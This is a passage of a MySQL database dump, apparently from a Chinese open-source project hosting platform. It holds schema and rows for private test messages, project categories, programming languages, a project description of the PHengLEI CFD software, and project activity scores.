15:05:29'),(218,219,219,219,'Principal','2021-03-12 20:36:44','2021-03-12 20:36:44'),(219,220,220,220,'Principal','2021-03-13 11:50:02','2021-03-13 11:50:02'),(220,221,221,221,'Principal','2021-03-13 14:46:34','2021-03-13 14:46:34');
|
||
/*!40000 ALTER TABLE `principal_activities` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `private_messages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `private_messages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `private_messages` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`target_id` int(11) DEFAULT NULL,
|
||
`sender_id` int(11) DEFAULT NULL,
|
||
`receiver_id` int(11) DEFAULT NULL,
|
||
`content` text,
|
||
`send_time` datetime DEFAULT NULL,
|
||
`status` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_private_messages_on_user_id` (`user_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=41 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `private_messages`
|
||
--
|
||
|
||
LOCK TABLES `private_messages` WRITE;
|
||
/*!40000 ALTER TABLE `private_messages` DISABLE KEYS */;
|
||
INSERT INTO `private_messages` VALUES (1,4,1,4,1,'嗨','2018-07-11 09:44:06',1,'2018-07-11 09:44:06','2018-07-11 09:44:06'),(2,1,4,4,1,'嗨','2018-07-11 09:44:06',1,'2018-07-11 09:44:06','2018-07-11 09:44:06'),(3,5,1,5,1,'嗨','2018-07-31 17:06:42',1,'2018-07-31 17:06:42','2018-07-31 17:06:42'),(4,1,5,5,1,'嗨','2018-07-31 17:06:42',1,'2018-07-31 17:06:42','2018-07-31 17:06:42'),(5,50,20,50,20,'测试私信功能','2019-09-09 08:57:09',1,'2019-09-09 08:57:09','2019-09-09 08:57:09'),(6,20,50,50,20,'测试私信功能','2019-09-09 08:57:09',1,'2019-09-09 08:57:09','2019-09-09 08:57:09'),(7,50,20,50,20,'这是测试私信的功能','2019-09-09 08:57:32',1,'2019-09-09 08:57:32','2019-09-09 08:57:32'),(8,20,50,50,20,'这是测试私信的功能','2019-09-09 08:57:32',1,'2019-09-09 08:57:32','2019-09-09 08:57:32'),(9,20,50,20,50,'<p>\r\n hello,私信已收到了\r\n</p>','2019-09-09 08:58:40',1,'2019-09-09 08:58:40','2019-09-09 08:58:40'),(10,50,20,20,50,'<p>\r\n hello,私信已收到了\r\n</p>','2019-09-09 08:58:40',1,'2019-09-09 08:58:40','2019-09-09 08:58:40'),(11,55,55,55,55,'请修改说明','2019-09-16 10:21:20',1,'2019-09-16 10:21:20','2019-09-16 10:21:20'),(12,55,55,55,55,'请修改说明','2019-09-16 10:21:20',1,'2019-09-16 10:21:20','2019-09-16 10:21:20'),(13,55,55,55,55,'好的<br />','2019-09-16 10:24:12',1,'2019-09-16 10:24:12','2019-09-16 10:24:12'),(14,55,55,55,55,'好的<br />','2019-09-16 10:24:12',1,'2019-09-16 10:24:12','2019-09-16 10:24:12'),(15,55,55,55,55,'和','2019-09-16 10:24:51',1,'2019-09-16 10:24:51','2019-09-16 10:24:51'),(16,55,55,55,55,'和','2019-09-16 10:24:51',0,'2019-09-16 10:24:51','2019-09-16 10:24:51'),(17,55,52,55,52,'好的','2019-09-16 10:25:23',1,'2019-09-16 10:25:23','2019-09-16 10:25:23'),(18,52,55,55,52,'好的','2019-09-16 10:25:23',1,'2019-09-16 10:25:23','2019-09-16 10:25:23'),(19,49,52,49,52,'你好','2019-10-25 09:35:02',1,'2019-10-25 09:35:02','2019-10-25 09:35:02'),(20,52,49,49,52,'你好','2019-10-25 09:35:02',1,'2019-10-25 09:35:02','2019-10-25 09:35:02'),(21,49,46,49,46,'啊啊adddvdasssasasaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa','2019-10-25 09:42:38',1,'2019-10-25 09:42:38','2019-10-25 09:42:38'),(22,46,49,49,46,'啊啊adddvdasssasasaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa','2019-10-25 09:42:38',1,'2019-10-25 09:42:38','2019-10-25 09:42:38'),(23,49,46,49,46,'bug已经修改完成','2019-11-25 17:36:39',1,'2019-11-25 17:36:39','2019-11-25 17:36:39'),(24,46,49,49,46,'bug已经修改完成','2019-11-25 17:36:39',1,'2019-11-25 17:36:39','2019-11-25 17:36:39'),(25,73,1,73,1,'sss','2020-02-13 09:03:37',1,'2020-02-13 09:03:37','2020-02-13 09:03:37'),(26,1,73,73,1,'sss','2020-02-13 09:03:37',1,'2020-02-13 09:03:37','2020-02-13 09:03:37'),(27,111,46,111,46,'测试','2020-07-30 14:45:17',1,'2020-07-30 14:45:17','2020-07-30 14:45:17'),(28,46,111,111,46,'测试','2020-07-30 14:45:17',1,'2020-07-30 14:45:17','2020-07-30 14:45:17'),(29,111,1,111,1,'再试试','2020-07-30 16:11:24',1,'2020-07-30 16:11:24','2020-07-30 16:11:24'),(30,1,111,111,1,'再试试','2020-07-30 16:11:24',1,'2020-07-30 16:11:24','2020-07-30 16:11:24'),(31,66,111,66,111,'你好,我对你的话题很感兴趣!','2020-08-14 15:01:22',1,'2020-08-14 15:01:22','2020-08-14 15:01:22'),(32,111,66,66,111,'你好,我对你的话题很感兴趣!','2020-08-14 15:01:22',1,'2020-08-14 15:01:22','2020-08-14 15:01:22'),(33,1,50,1,50,'<p>\r\n <img src=\"/files/uploads/image/202008/70246d93a3cb.png\" title=\"image\" alt=\"image\" />\r\n</p>\r\n<p>\r\n <br />\r\n</p>\r\n<p>\r\n ## 你好\r\n</p>\r\n<p>\r\n <br />\r\n</p>\r\n<p>\r\n `\r\n</p>\r\n<p>\r\n ddd\r\n</p>\r\n<p>\r\n `\r\n</p>\r\n<p>\r\n <br />\r\n</p>','2020-08-18 11:59:05',1,'2020-08-18 11:59:05','2020-08-18 11:59:05'),(34,50,1,1,50,'<p>\r\n <img src=\"/files/uploads/image/202008/70246d93a3cb.png\" title=\"image\" alt=\"image\" />\r\n</p>\r\n<p>\r\n <br />\r\n</p>\r\n<p>\r\n ## 你好\r\n</p>\r\n<p>\r\n <br />\r\n</p>\r\n<p>\r\n `\r\n</p>\r\n<p>\r\n ddd\r\n</p>\r\n<p>\r\n `\r\n</p>\r\n<p>\r\n <br />\r\n</p>','2020-08-18 11:59:05',0,'2020-08-18 11:59:05','2020-08-18 11:59:05'),(35,49,1,49,1,'发士大夫','2021-02-24 10:32:22',1,'2021-02-24 10:32:22','2021-02-24 10:32:22'),(36,1,49,49,1,'发士大夫','2021-02-24 10:32:22',1,'2021-02-24 10:32:22','2021-02-24 10:32:22'),(37,49,46,49,46,'暗室逢灯','2021-02-24 10:32:26',1,'2021-02-24 10:32:26','2021-02-24 10:32:26'),(38,46,49,49,46,'暗室逢灯','2021-02-24 10:32:26',0,'2021-02-24 10:32:26','2021-02-24 10:32:26'),(39,49,52,49,52,'啊手动阀','2021-02-24 10:32:30',1,'2021-02-24 10:32:30','2021-02-24 10:32:30'),(40,52,49,49,52,'啊手动阀','2021-02-24 10:32:30',0,'2021-02-24 10:32:30','2021-02-24 10:32:30');
|
||
/*!40000 ALTER TABLE `private_messages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `project_categories`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `project_categories`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `project_categories` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`position` int(11) DEFAULT NULL,
|
||
`projects_count` int(11) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`ancestry` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_project_categories_on_ancestry` (`ancestry`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=18 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `project_categories`
|
||
--
|
||
|
||
LOCK TABLES `project_categories` WRITE;
|
||
/*!40000 ALTER TABLE `project_categories` DISABLE KEYS */;
|
||
INSERT INTO `project_categories` VALUES (1,'大数据',1,25,'2020-08-04 08:07:01','2020-08-04 08:07:01',NULL),(2,'机器学习',2,6,'2020-08-04 08:07:01','2020-08-04 08:07:01',NULL),(3,'深度学习',3,1,'2020-08-04 08:07:01','2020-08-04 08:07:01',NULL),(4,'人工智能',4,5,'2020-08-04 08:07:01','2020-08-04 08:07:01',NULL),(5,'量子计算',5,1,'2020-08-04 08:07:01','2020-08-04 08:07:01',NULL),(6,'智慧医疗',6,4,'2020-08-04 08:07:01','2020-08-04 08:07:01',NULL),(7,'自动驾驶',7,0,'2020-08-04 08:07:01','2020-08-04 08:07:01',NULL),(8,'其他',8,96,'2020-08-04 08:07:01','2020-08-04 08:07:01',NULL),(9,'云计算',9,1,'2020-08-17 02:18:26','2020-08-17 02:18:26',NULL),(10,'Web应用',10,10,'2020-08-17 02:18:56','2020-08-17 02:18:56',NULL),(11,'开发工具',11,1,'2020-08-17 02:19:02','2020-08-17 02:19:02',NULL),(12,'操作系统',12,0,'2020-08-17 02:19:19','2020-08-17 02:19:19',NULL),(13,'数据库',13,2,'2020-08-17 02:19:24','2020-08-17 02:19:24',NULL),(14,'机器人',14,0,'2020-08-17 02:20:57','2020-08-17 02:20:57',NULL),(15,'移动应用',15,0,'2020-08-17 02:21:25','2020-08-17 02:21:25',NULL),(16,'芯片与指令集',16,8,'2020-08-17 02:22:15','2020-08-17 02:22:15',NULL),(17,'前沿理论',17,2,'2020-08-17 02:23:45','2020-08-17 02:23:45',NULL);
|
||
/*!40000 ALTER TABLE `project_categories` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `project_details`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `project_details`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `project_details` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`content` longtext,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_project_details_on_project_id` (`project_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `project_details`
|
||
--
|
||
|
||
LOCK TABLES `project_details` WRITE;
|
||
/*!40000 ALTER TABLE `project_details` DISABLE KEYS */;
|
||
INSERT INTO `project_details` VALUES (1,477,'风雷软件(PHengLEI,Platform for Hybrid ENGineering simulation of flows)是中国空气动力研究与发展中心(CARDC)研发的面向流体工程的混合CFD平台。平台以面向对象的设计理念,采用C++语言编程。为了适应结构网格、非结构网格、混合网格、重叠网格等不同网格的计算,设计了具有良好通用性、可扩展性的体系结构和数据结构,实现了在同一个软件平台上,同时兼容结构求解器和非结构求解器。两种求解器可独立运行,也能耦合计算,即在流场中同时含有结构网格和非结构网格的情况下,在结构网格上调用结构求解器,在非结构网格上调用非结构求解器。','2021-01-26 02:45:56','2021-01-26 02:45:56'),(2,494,'asdfasdfasdfasd','2021-02-22 08:32:41','2021-02-22 08:32:41');
|
||
/*!40000 ALTER TABLE `project_details` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `project_educoders`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `project_educoders`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `project_educoders` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`owner` varchar(255) DEFAULT NULL,
|
||
`repo_name` varchar(255) DEFAULT NULL,
|
||
`image_url` varchar(255) DEFAULT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`commit_count` int(11) DEFAULT '0',
|
||
`forked_count` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_project_educoders_on_repo_name` (`repo_name`),
|
||
KEY `index_project_educoders_on_project_id` (`project_id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `project_educoders`
|
||
--
|
||
|
||
LOCK TABLES `project_educoders` WRITE;
|
||
/*!40000 ALTER TABLE `project_educoders` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `project_educoders` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `project_infos`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `project_infos`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `project_infos` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=136 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `project_infos`
|
||
--
|
||
|
||
LOCK TABLES `project_infos` WRITE;
|
||
/*!40000 ALTER TABLE `project_infos` DISABLE KEYS */;
|
||
INSERT INTO `project_infos` VALUES (5,31,1,'2018-08-21 22:01:46','2018-08-21 22:01:46'),(9,100,6,'2019-01-22 00:40:07','2019-01-22 00:40:07'),(10,101,6,'2019-01-22 09:10:32','2019-01-22 09:10:32'),(11,102,6,'2019-01-22 09:32:37','2019-01-22 09:32:37'),(12,103,6,'2019-01-22 09:32:38','2019-01-22 09:32:38'),(13,130,42,'2019-04-17 09:55:48','2019-04-17 09:55:48'),(14,130,43,'2019-04-17 09:57:04','2019-04-17 09:57:04'),(17,130,46,'2019-08-13 17:14:00','2019-08-13 17:14:00'),(18,130,49,'2019-08-13 17:19:25','2019-08-13 17:19:25'),(23,161,49,'2019-10-08 10:51:53','2019-10-08 10:51:53'),(24,159,20,'2019-10-08 11:17:57','2019-10-08 11:17:57'),(32,169,49,'2019-10-23 16:37:05','2019-10-23 16:37:05'),(34,127,41,'2019-10-28 15:11:19','2019-10-28 15:11:19'),(37,178,46,'2019-10-29 16:29:30','2019-10-29 16:29:30'),(57,199,46,'2019-11-07 15:53:58','2019-11-07 15:53:58'),(59,199,64,'2019-11-07 16:20:28','2019-11-07 16:20:28'),(60,199,65,'2019-11-08 10:52:01','2019-11-08 10:52:01'),(64,203,46,'2019-11-11 09:02:38','2019-11-11 09:02:38'),(65,203,48,'2019-11-11 09:11:06','2019-11-11 09:11:06'),(66,203,66,'2019-11-11 09:12:57','2019-11-11 09:12:57'),(76,199,48,'2019-11-11 11:08:00','2019-11-11 11:08:00'),(77,224,64,'2019-11-11 11:38:58','2019-11-11 11:38:58'),(78,225,49,'2019-11-11 11:44:39','2019-11-11 11:44:39'),(79,226,50,'2019-11-11 12:34:37','2019-11-11 12:34:37'),(83,230,49,'2019-11-11 15:37:23','2019-11-11 15:37:23'),(84,231,64,'2019-11-11 15:37:29','2019-11-11 15:37:29'),(85,232,64,'2019-11-11 17:08:54','2019-11-11 17:08:54'),(94,248,65,'2019-11-22 15:41:18','2019-11-22 15:41:18'),(95,250,50,'2019-12-04 08:21:58','2019-12-04 08:21:58'),(96,251,76,'2020-02-01 20:36:53','2020-02-01 20:36:53'),(97,252,76,'2020-02-01 21:18:26','2020-02-01 21:18:26'),(98,253,75,'2020-02-01 22:24:23','2020-02-01 22:24:23'),(99,256,78,'2020-02-03 17:44:53','2020-02-03 17:44:53'),(100,251,79,'2020-02-04 22:06:21','2020-02-04 22:06:21'),(101,251,80,'2020-02-04 22:15:09','2020-02-04 22:15:09'),(102,255,76,'2020-02-05 11:17:13','2020-02-05 11:17:13'),(103,255,82,'2020-02-10 10:14:29','2020-02-10 10:14:29'),(104,255,86,'2020-02-10 10:14:42','2020-02-10 10:14:42'),(105,255,85,'2020-02-10 10:14:57','2020-02-10 10:14:57'),(106,255,87,'2020-02-10 10:15:07','2020-02-10 10:15:07'),(107,255,81,'2020-02-10 10:15:35','2020-02-10 10:15:35'),(108,255,88,'2020-02-10 10:16:14','2020-02-10 10:16:14'),(109,255,90,'2020-02-10 10:16:23','2020-02-10 10:16:23'),(110,255,91,'2020-02-10 10:16:40','2020-02-10 10:16:40'),(111,255,95,'2020-02-10 10:16:47','2020-02-10 10:16:47'),(112,255,96,'2020-02-10 10:16:56','2020-02-10 10:16:56'),(113,255,97,'2020-02-10 10:17:38','2020-02-10 10:17:38'),(114,255,98,'2020-02-10 10:17:47','2020-02-10 10:17:47'),(115,255,99,'2020-02-10 10:17:55','2020-02-10 10:17:55'),(116,255,75,'2020-02-10 10:18:04','2020-02-10 10:18:04'),(117,255,84,'2020-02-10 10:20:11','2020-02-10 10:20:11'),(118,255,89,'2020-02-10 10:20:19','2020-02-10 10:20:19'),(119,255,93,'2020-02-10 10:20:29','2020-02-10 10:20:29'),(120,255,80,'2020-02-10 10:20:38','2020-02-10 10:20:38'),(121,255,94,'2020-02-10 10:20:47','2020-02-10 10:20:47'),(122,255,100,'2020-02-10 10:20:56','2020-02-10 10:20:56'),(123,255,102,'2020-02-10 10:21:04','2020-02-10 10:21:04'),(124,255,92,'2020-02-10 10:22:04','2020-02-10 10:22:04'),(125,255,83,'2020-02-10 10:26:53','2020-02-10 10:26:53'),(126,269,47,'2020-02-11 09:46:46','2020-02-11 09:46:46'),(127,255,101,'2020-02-11 16:43:58','2020-02-11 16:43:58'),(128,272,80,'2020-03-09 10:22:41','2020-03-09 10:22:41'),(129,255,104,'2020-03-19 14:01:17','2020-03-19 14:01:17'),(130,255,107,'2020-03-19 15:13:11','2020-03-19 15:13:11'),(131,255,106,'2020-03-19 15:15:15','2020-03-19 15:15:15'),(132,255,109,'2020-03-19 15:15:17','2020-03-19 15:15:17'),(133,255,108,'2020-03-19 15:17:18','2020-03-19 15:17:18'),(134,255,105,'2020-03-19 15:23:57','2020-03-19 15:23:57'),(135,266,63,'2020-03-19 15:51:49','2020-03-19 15:51:49');
|
||
/*!40000 ALTER TABLE `project_infos` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `project_languages`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `project_languages`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `project_languages` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`position` int(11) DEFAULT NULL,
|
||
`projects_count` int(11) DEFAULT '0',
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=35 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `project_languages`
|
||
--
|
||
|
||
LOCK TABLES `project_languages` WRITE;
|
||
/*!40000 ALTER TABLE `project_languages` DISABLE KEYS */;
|
||
INSERT INTO `project_languages` VALUES (1,'Ruby',NULL,11,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(2,'C',NULL,3,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(3,'C#',NULL,9,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(4,'C++',NULL,31,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(5,'HTML',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(6,'Haml',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(7,'CSS',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(8,'JavaScript',NULL,3,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(9,'Python',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(10,'PHP',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(11,'Java',NULL,14,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(12,'JSON',NULL,3,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(13,'JSX',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(14,'Lex',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(15,'Shell',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(16,'Objective-C',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(17,'Cycript',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(18,'Clojure',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(19,'Go',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(20,'Grace',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(21,'Gradle',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(22,'GraphQL',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(23,'Dart',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(24,'Elixir',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(25,'Erlang',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(26,'Perl',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(27,'R',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(28,'Reason',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(29,'Sass',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(30,'Slice',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(31,'SVG',NULL,0,'2020-08-04 08:07:01','2020-08-04 08:07:01'),(32,'Rust',0,0,'2020-08-17 02:24:28','2020-08-17 02:24:28'),(33,'其他',0,5,'2020-08-17 02:24:32','2020-08-17 02:24:32'),(34,'risc-v',0,2,'2020-08-17 02:29:51','2020-08-17 02:29:51');
|
||
/*!40000 ALTER TABLE `project_languages` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `project_scores`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `project_scores`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `project_scores` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` varchar(255) DEFAULT NULL,
|
||
`score` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`issue_num` int(11) DEFAULT '0',
|
||
`issue_journal_num` int(11) DEFAULT '0',
|
||
`news_num` int(11) DEFAULT '0',
|
||
`documents_num` int(11) DEFAULT '0',
|
||
`changeset_num` int(11) DEFAULT '0',
|
||
`board_message_num` int(11) DEFAULT '0',
|
||
`board_num` int(11) DEFAULT '0',
|
||
`attach_num` int(11) DEFAULT '0',
|
||
`commit_time` datetime DEFAULT NULL,
|
||
`pull_request_num` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=340 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `project_scores`
|
||
--
|
||
|
||
LOCK TABLES `project_scores` WRITE;
|
||
/*!40000 ALTER TABLE `project_scores` DISABLE KEYS */;
|
||
INSERT INTO `project_scores` VALUES (18,'25',0,'2018-08-21 16:25:32','2019-01-13 11:27:49',0,0,0,0,793,0,0,0,'2017-11-08 23:28:56',0),(21,'28',0,'2018-08-21 18:44:13','2019-01-15 09:24:56',0,0,0,0,2236,0,0,0,'2018-08-21 07:53:07',0),(22,'29',0,'2018-08-21 18:46:26','2019-01-12 15:27:10',0,0,0,0,134,0,0,0,'2018-05-09 14:22:16',0),(24,'31',0,'2018-08-21 20:18:26','2019-01-12 09:59:17',0,0,0,0,22883,0,0,0,'2018-08-21 20:45:47',0),(25,'32',0,'2018-08-21 20:34:40','2019-01-09 18:53:38',1,0,0,0,137915,0,0,0,'2018-05-04 06:08:43',0),(27,'34',0,'2018-08-21 21:29:25','2018-08-21 23:27:54',0,0,0,0,19804,0,0,0,'2018-08-21 19:00:31',0),(31,'38',0,'2018-08-21 23:15:14','2018-08-21 23:19:59',0,0,0,0,15,0,0,0,'2018-08-07 13:58:08',0),(34,'41',0,'2018-08-21 23:38:54','2019-01-09 18:52:38',0,0,0,0,29,0,0,0,'2016-07-02 23:36:31',0),(35,'42',0,'2018-08-21 23:40:52','2019-01-10 00:20:17',0,0,0,0,3,0,0,0,'2017-04-17 17:16:32',0),(36,'43',0,'2018-08-21 23:42:57','2019-01-14 15:58:06',0,0,0,0,15,0,0,0,'2018-07-06 21:58:35',0),(47,'54',0,'2018-08-22 15:51:27','2018-08-22 15:51:27',0,0,0,0,0,0,0,0,NULL,0),(50,'57',0,'2018-08-22 16:07:33','2019-01-09 18:55:37',0,0,0,0,15,0,0,0,'2017-09-12 22:37:34',0),(51,'58',0,'2018-08-22 16:38:07','2019-01-09 18:58:41',0,0,0,0,72,0,0,0,'2018-08-16 14:31:26',0),(52,'59',0,'2018-08-22 16:43:41','2019-01-09 19:00:48',0,0,0,0,8,0,0,0,'2018-01-12 23:47:34',0),(53,'60',0,'2018-08-22 16:46:06','2019-01-09 19:02:05',0,0,0,0,72,0,0,0,'2015-03-28 10:41:26',0),(54,'61',0,'2018-08-22 16:47:36','2019-01-11 10:03:55',0,0,0,0,28,0,0,0,'2018-02-13 00:15:07',0),(55,'62',0,'2018-08-22 16:54:53','2019-01-09 18:52:12',0,0,0,0,198,0,0,0,'2018-04-17 03:54:49',0),(56,'63',0,'2018-08-22 16:59:13','2019-01-15 16:00:42',0,0,0,0,9,0,0,0,'2013-01-28 14:24:46',0),(57,'64',0,'2018-08-22 17:00:31','2019-01-09 18:55:36',0,0,0,0,11,0,0,0,'2015-04-07 11:27:49',0),(58,'65',0,'2018-08-22 17:02:57','2019-01-14 06:14:56',0,0,0,0,124,0,0,0,'2013-06-11 08:05:13',0),(59,'66',0,'2018-08-22 17:04:41','2019-01-14 12:42:10',0,0,0,0,14,0,0,0,'2018-01-01 21:18:03',0),(60,'67',0,'2018-08-22 17:07:58','2019-01-08 15:45:48',0,0,0,0,6,0,0,0,'2015-08-05 08:09:55',0),(62,'69',0,'2018-11-22 20:39:28','2018-11-22 22:28:41',0,0,0,0,875,0,0,0,'2018-11-20 09:13:46',0),(63,'70',0,'2018-11-22 22:27:30','2018-11-22 22:27:31',0,0,0,0,0,0,0,0,NULL,0),(66,'73',0,'2018-11-22 23:02:24','2018-11-22 23:05:11',0,0,0,0,15,0,0,0,'2018-11-22 13:03:29',0),(69,'76',0,'2018-11-22 23:26:45','2019-01-14 13:22:14',3,0,0,0,370,0,0,0,'2018-10-10 15:39:15',0),(71,'78',0,'2018-11-23 06:51:35','2018-11-23 06:51:35',0,0,0,0,0,0,0,0,NULL,0),(72,'79',0,'2018-11-23 10:06:14','2018-11-23 10:33:48',0,0,0,0,15,0,0,0,'2018-11-23 10:33:35',0),(73,'80',0,'2019-01-15 14:28:55','2019-01-15 14:28:56',0,0,0,0,0,0,0,0,NULL,0),(74,'81',0,'2019-01-15 15:05:57','2019-01-15 15:08:31',1,0,0,0,0,0,0,0,NULL,0),(75,'82',0,'2019-01-17 15:18:21','2019-01-17 15:18:21',0,0,0,0,0,0,0,0,NULL,0),(92,'99',0,'2019-01-21 23:49:37','2019-01-21 23:49:41',0,0,0,0,0,0,0,0,NULL,0),(93,'100',0,'2019-01-22 00:19:13','2019-01-22 00:57:05',5,6,0,0,1,0,0,0,'2019-01-22 00:37:49',0),(94,'101',0,'2019-01-22 09:06:36','2019-01-22 09:20:38',2,2,0,0,1,0,0,0,'2019-01-22 09:12:26',0),(95,'102',0,'2019-01-22 09:32:37','2019-01-22 09:32:37',0,0,0,0,NULL,0,0,0,NULL,0),(96,'103',0,'2019-01-22 09:32:38','2019-01-22 09:32:39',0,0,0,0,NULL,0,0,0,NULL,0),(113,'120',0,'2019-03-04 